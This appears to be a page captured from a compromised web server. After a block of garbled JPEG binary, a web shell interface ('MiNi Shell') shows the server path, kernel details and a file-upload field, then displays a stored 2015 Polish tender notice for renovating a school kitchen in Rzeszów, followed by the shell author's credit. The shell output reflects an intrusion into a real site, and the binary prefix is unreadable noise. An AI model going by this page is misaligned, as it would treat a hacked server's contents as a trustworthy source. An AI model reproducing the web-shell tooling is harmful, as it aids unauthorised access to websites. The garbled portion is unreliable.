JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150525/75211-N-2015.html

<p class="kh_header"><b>Rzeszów: Modernizacja bloku  żywieniowego  w  Zespole Szkolno- Przedszkolnym Nr 6 
                                         przy ul. Krzyżanowskiego 24 w Rzeszowie</b><br>
<b>Numer ogłoszenia: 75211 - 2015; data zamieszczenia: 25.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkolno-Przedszkolny Nr 6 w Rzeszowie , ul. Krzyżanowskiego 24, 35-329 Rzeszów, woj. podkarpackie, tel. 17 7482600, faks 17 7482 610.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zszp6.rzeszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja bloku  żywieniowego  w  Zespole Szkolno- Przedszkolnym Nr 6 
                                         przy ul. Krzyżanowskiego 24 w Rzeszowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zakres  realizacji przedmiotu zamówienia wchodzi wykonanie następujących robot :
      1.wymianę stolarki drzwiowej z poszerzeniem otworów drzwiowych ,
      2. skucie starych płytek ściennych wraz tynkiem i ułożenie nowych płytek,
      3. skucie posadzek  i wykonanie nowych, 
      4. wymiana posadzek PCV  na wykładzinę PCV homogeniczną , antypoślizgową  w jadalni 
      5.wymiana urządzeń instalacji wod.kan. wraz z armaturą  
      6. roboty malarskie i wykończeniowe kuchni wraz z zapleczem  kuchennym i  jadalni  oraz klatki schodowej ,
      7. wymiana instalacji elektrycznej wraz oprzyrządowaniem ,
      8. dostawa i montaż windy towarowej .
      9. wymiana istniejącej instalacji wentylacji  mechanicznej nawiewno wywiewnej dla kuchni i jadalni 
          zgodnie z zał. nr 5 -Program funkcjonalno -użytkowy   w formule zaprojektuj i wybuduj.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówień uzupełniających będą roboty tego samego rodzaju i zgodne z robotami wchodzącymi w zakres przedmiotu zamówienia podstawowego.  Wartość zamówień uzupełniających  wynosić będzie  maksymalnie  20 % zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.43.30.00-7, 45.26.26.00-5, 45.42.11.00-5, 45.43.11.00-8, 45.43.12.00-9, 45.43.21.11-5, 45.43.21.00-8, 45.31.12.00-2, 45.33.24.00-7, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia 
Dla zakresu określonego  w Rozdziale III siwz pkt 4 a  do pkt. 4 h.
 Wykonawca musi wykazać  wykonanie  w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli   okres prowadzenia działalności  jest krótszy , w tym okresie co najmniej  2 zamówienia  polegające  na wykonaniu robót budowlano remontowych    potwierdzających posiadanie niezbędnej wiedzy i doświadczenia o  wartości  min 200 000 zł brutto każda. Dla zakresu określonego  w Rozdziale III siwz  pkt 4 i  Wykonawca musi wykazać  wykonanie w okresie ostatnich 5 lat przed upływem terminu   składania ofert, a   jeżeli okres  prowadzenia działalności jest krótszy  w tym okresie, co najmniej 2 robót   budowlanych  potwierdzających   posiadanie  niezbędnej  wiedzy i doświadczenia o wartości min. 50 000 zł   brutto każda. Wykonawca musi wykazać   wykonanie w  okresie ostatnich 3 lat przed upływem terminu składania ofert, a   jeżeli   okres prowadzenia działalności jest krótszy  w tym okresie,  co najmniej  dwóch  projektów  z zakresu   instalacji  wentylacji  mechanicznej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien wskazać: 1 osobę kierownika robót  do pełnienia funkcji kierownika budowy legitymującą się uprawnieniami do pełnienia   samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno  budowlanej do kierowania    robotami  budowlanymi bez ograniczeń lub posiadającą  inne odpowiadające ww. tożsame uprawnienia wydane   na podstawie przepisów obowiązujących w czasie wydania uprawnień , 
1 osobę kierownika robót do pełnienia funkcji kierownika budowy legitymującą się uprawnieniami do pełnienia  samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej  w zakresie sieci  wodociągowej  i kanalizacyjnej  do kierowania  robotami bez ograniczeń lub posiadającą  inne odpowiadające ww. tożsame  uprawnienia wydane  na podstawie przepisów obowiązujących w czasie wydania uprawnień ,
1 osobę  kierownika robót do pełnienia funkcji kierownika budowy legitymującą się uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i  urządzeń elektrycznych do kierowania  robotami bez ograniczeń lub posiadającą  inne odpowiadające ww  tożsame  uprawnienia wydane  na podstawie przepisów obowiązujących w czasie wydania uprawnień, 
1 osobę Kierownika robót  legitymującą się uprawnieniami do pełnienia samodzielnych  funkcji technicznych w   budownictwie  do kierowania robotami budowlanymi  w specjalności  w zakresie instalacji i urządzeń cieplnych ,wentylacyjnych i gazowych  
1 osobę  z  uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie do  projektowania w  specjalności  instalacyjnej w zakresie instalacji i urządzeń cieplnych wentylacyjnych i gazowych albo posiadającą  inne uprawnienia odpowiadające powyższym, wydane na podstawie przepisów obowiązujących w  dniu  przyznania uprawnień,
 1 osobę  z  uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie do  projektowania w  specjalności  instalacyjnej w zakresie w zakresie sieci instalacji elektrycznych i elektroenergetycznych albo  posiadającą inne uprawnienia odpowiadające powyższym, wydane na podstawie przepisów obowiązujących w  dniu przyznania uprawnień</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia  w sytuacji ekonomicznej i finansowej gwarantującej należyte wykonanie zamówienia   wykonawca musi  wykazać że posiada środki  finansowe lub zdolność kredytową w kwocie nie mniejszej niż  400 000 zł, przedłoży  polisę  lub inny dokument ubezpieczenia potwierdzający, że  wykonawca jest ubezpieczony od  odpowiedzialności cywilnej w zakresie prowadzonej  działalności  gospodarczej na kwotę  nie mniejszej niż 400 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Do oferty Wykonawca winien załączyć kosztorys ofertowy sporządzony wg. następujących zasad : metoda kalkulacji szczegółowej polegająca na obliczeniu wartości robót, jako suma iloczynów  ilości jednostek   obmiarowych robót, jednostkowych nakładów rzeczowych RMS i ich cen oraz doliczonych kosztów pośrednich i zysku.   Koszty zakupu materiałów winny być wkalkulowane w   ceny materiałów bądź wyliczone ,jako wskaźnik procentowy .Do  wyliczonej w ten sposób wartości  Wykonawca dolicza podatek od towarów i usług VAT. , kosztorys ofertowy winien być sporządzony : wg podstaw wyceny kreślonych w przedmiarach,w oparciu  przedmiary robót, w  oparciu o specyfikację techniczna wykonania i odbioru robót, w oparciu o warunki podane w specyfikacji istotnych warunków zamówienia , dodatkowo dla każdej pozycji kosztorysu Wykonawca winien podać cenę jednostkową dla 1  jednostki przedmiaru robót  tj. wartość kosztów bezpośrednich R,M,S z doliczeniem kosztów   pośrednich, zakupu i zysku ,bez podatku VAT.  , cena wynikająca z kosztorysu ofertowego winna być zgodna z ceną w ofercie  , w cenie należy uwzględnić wszystkie koszty związane z wykonaniem przedmiotu zamówienia w tym te ,o których mowa   w pkt. V  siwz.
Oferta winna być sporządzona na lub w oparciu o Wzór formularza oferty załącznik nr 1 do siwz oraz zawierać załączniki wymienione w Rozdziale IX pkt. 1 siwz</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres gwarancji i rękojmi - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający, niezależnie od pozostałych przypadków przewidzianych w umowie, dopuszcza możliwość zmian postanowień w niej zawartych, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej:
a.Udzielenia Wykonawcy zamówień dodatkowych lub uzupełniających, od wykonania których uzależniona jest realizacja umowy, 
b.Ograniczenia zakresu rzeczowego umowy,
c.Zmiany przepisów prawnych dotyczących przedmiotu umowy, jeżeli zmiana przepisów wymaga zmiany postanowień umowy,
d.Sytuacji niezależnych od stron umowy.
e.  W przypadku działania siły wyższej, powodującej konieczność wprowadzenia zmian do umowy. Przez działanie siły 
      wyższej należy rozumieć zdarzenie bądź połączenie zdarzeń obiektywnie niezależnych od stron umowy, które 
      zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których strony 
      umowy nie mogły przewidzieć i którym nie mogły zapobiec, ani ich przezwyciężyć i im przeciwdziałać poprzez 
      działanie z należytą starannością. Wykonawca jest zobowiązany niezwłocznie poinformować Zamawiającego o fakcie 
      zaistnienia siły wyższej oraz wskazać zakres i wpływ jakie zdarzenie miało na przebieg realizacji przedmiotu umowy.
f.  Gdy potrzeba wprowadzenia zmian do umowy wynika ze zmian natury technicznej i prawnej 
      g.  Zamawiający dopuszcza, w uzasadnionych przypadkach, zmianę postanowień umowy w  zakresie podwykonawstwa 
          wraz z konsekwencjami z tego wynikającymi, w razie wystąpienia okoliczności .1.w przypadku konieczności zmiany 
          zakresu podwykonawstwa w stosunku do wskazanego w ofercie lub rezygnacji z   wykonywania przedmiotu umowy w 
         podwykonawstwie 2.w  przypadku zmiany lub rezygnacji z podwykonawcy, przy pomocy którego wykonawca zamierzał 
          wykonać   przedmiot umowy. 3.w  sytuacji, gdy wykonawca zamierzał wykonać przedmiot umowy samodzielnie,
          jednakże z uwagi na wystąpienie okoliczności niemożliwych do przewidzenia w dniu składania ofert, zachodzi 
          konieczność powierzenia wykonania  części zamówienia podwykonawcy. 4.w  sytuacji zmiany lub rezygnacji z 
          podwykonawcy, na którego zasoby wykonawca  powoływał się, na zasadach  określonych w art. 26 ust. 2b ustawy
          Prawo zamówień  publicznych, w celu wykazania spełniania warunków   udziału w postępowaniu wykonawca
          zobowiązany  jest wykazać zamawiającemu, iż proponowany inny  podwykonawca lub  wykonawca samodzielnie 
         spełnia dany warunek udziału w postępowaniu w stopniu nie  mniejszym niż wymagany w trakcie postępowania o 
         udzielenie zamówienia. Wykonawca  zobowiązany jest  wykazać spełnienie warunku udziału w postępowaniu na dzień 
         złożenia   wniosku o dokonanie takiej zmiany oraz   udokumentować spełnienie tego warunku zgodnie  z wymaganiami 
         określonymi w pkt. VII.2 specyfikacji istotnych   warunków zamówienia. Dokonując powyższych zmian wykonawca 
        zadba o odpowiednie stosowanie regulacji umowy w zakresie podwykonawstwa oraz o zabezpieczenie ewentualnych 
         roszczeń za dotychczas wykonane zakresy robót lub usług. 
2.	Zamawiający ponadto dopuszcza możliwość zmiany terminu wykonania umowy w sytuacji, gdy:
a. Wystąpią przeszkody natury prawnej lub technicznej.
       b.Wykonawca zakończy realizację przedmiotu umowy przed terminem</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zszp6.rzeszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkolno-Przedszkolny Nr 6   
                                                          35-329 Rzeszów, ul.Krzyżanowskiego 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2015 godzina 08:30, miejsce: Zespół Szkolno-Przedszkolny Nr 6   35-329 Rzeszów, ul.Krzyżanowskiego 24    sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobą uprawnioną do porozumiewania się z Wykonawcami jest: Pani Grażyna Rzucidło Zespół  Szkolno-Przedszkolny Nr 6 w Rzeszowie  przy ul. Krzyżanowskiego 24    tel.17 748 26 00.  Zamawiający otworzy koperty z ofertami i zmianami w dniu 08.06.2015 r. o godz. 09:00 w  w Zespole Szkolno-  
    Przedszkolnym  Nr 6, 35-329 Rzeszów,  ul.Krzyżanowskiego 24.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com